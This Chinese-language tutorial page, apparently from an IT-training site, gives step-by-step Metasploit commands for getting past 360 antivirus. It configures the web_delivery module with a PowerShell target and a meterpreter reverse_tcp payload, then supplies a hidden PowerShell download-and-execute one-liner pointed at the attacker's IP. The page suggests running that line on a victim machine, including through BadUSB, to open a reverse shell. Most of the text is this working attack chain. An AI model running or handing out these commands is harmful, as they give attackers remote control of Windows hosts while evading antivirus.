摘要:Metasploit后门免杀模块绕过360
Metasploit后门免杀模块绕过360
1.第一步:使用msf的脚本后门模块
use exploit/multi/script/web_delivery
2.第二步:使用 show opinion 查看需要使用的相关参数
show options
可看到下列参数:需要选择的是target、payload选项(包含ip以及端口)、uripath等
3.第三步:查看target 包含多少可选的目标选项,使用以下参数查看
show targets
可看到下列选项包含:Python/PHP/powershell
4.第四步:设置target 我们这里选择2 —-powershell的这脚本
set target 2
5.第五步:设置payload选项,设置windows(powershell)反弹shell链接
set payload windows/meterpreter/reverse_tcp
6.第六步:设置攻击者-端口默认是:4444,也可以更改 我这里就不设置了,直接用默认的端口
set LHOST 192.168.1.101
7.第七步:设置uripath 路径 设置为根目录—– ‘/‘
set URIPATH /
8.第八步:执行后门
exploit /
9.第九步:将代码复制目标机器上cmd 下运行——-利用思路可以用到“Badusb”等多种思路
powershell.exe -nop -w hidden -c $O=new-object net.webclient;$O.proxy=[Net.WebRequest]::GetSystemWebProxy();$O.Proxy.Credentials[Net.CredentialCache]::DefaultCredentials;IEX $O.downloadstring(‘http192。168。1。101:8080/‘); /度娘真的疯了 内网ip都吞
10.可看到反弹shell
session -i //查看回话ID 获取回话进入meterpreter 回话
本文由职坐标整理并发布,希望对同学们有所帮助。了解更多详情请关注职坐标软件测试之测试工具频道!
您输入的评论内容中包含违禁敏感词
我知道了
请输入正确的手机号码
请输入正确的验证码
您今天的短信下发次数太多了,明天再试试吧!
我们会在第一时间安排职业规划师联系您!
您也可以联系我们的职业规划师咨询:
版权所有 职坐标-一站式IT培训就业服务领导者 沪ICP备13042190号-4
上海海同信息科技有限公司 Copyright ©2015 www.zhizuobiao.com,All Rights Reserved.
沪公网安备 31011502005948号